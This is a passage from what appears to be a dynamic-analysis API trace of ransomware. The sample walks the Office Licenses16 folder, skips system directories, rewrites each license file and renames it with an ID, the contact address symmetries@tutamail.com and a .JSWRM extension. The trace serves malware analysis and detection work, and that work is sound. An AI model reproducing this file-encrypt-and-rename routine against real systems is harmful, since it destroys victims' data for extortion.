ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9e09eee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9ea28c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusMSDNR_Retail-ul-oob.xrm-ms", cAlternateFileName="PROPLU~2.XRM")) returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.888] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0108.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0108.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.889] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11600) returned 1 [0108.889] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.889] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.891] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.891] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.892] CloseHandle (hObject=0x45c) returned 1 [0108.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0108.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0108.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0108.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0108.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0108.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.892] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0108.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.893] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9de3c89, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9e7c5cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusMSDNR_Retail-ul-phn.xrm-ms", cAlternateFileName="PROPLU~1.XRM")) returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.893] lstrcmpiW (lpString1="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0108.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0108.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0108.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.894] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19945) returned 1 [0108.894] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.895] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.897] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.897] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.897] CloseHandle (hObject=0x45c) returned 1 [0108.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0108.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0108.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0108.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0108.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0108.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0108.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.898] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.899] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea23602f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea23602f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea2cea2d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5ee9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Grace-ppd.xrm-ms", cAlternateFileName="PR7ECC~1.XRM")) returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.899] lstrcmpiW (lpString1="ProPlusR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0108.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0108.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0108.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0108.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0108.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0108.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241290, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0108.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0108.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0108.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.900] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24297) returned 1 [0108.900] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0108.900] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0108.944] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.944] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0108.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.945] CloseHandle (hObject=0x45c) returned 1 [0108.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0108.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0108.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0108.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0108.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft 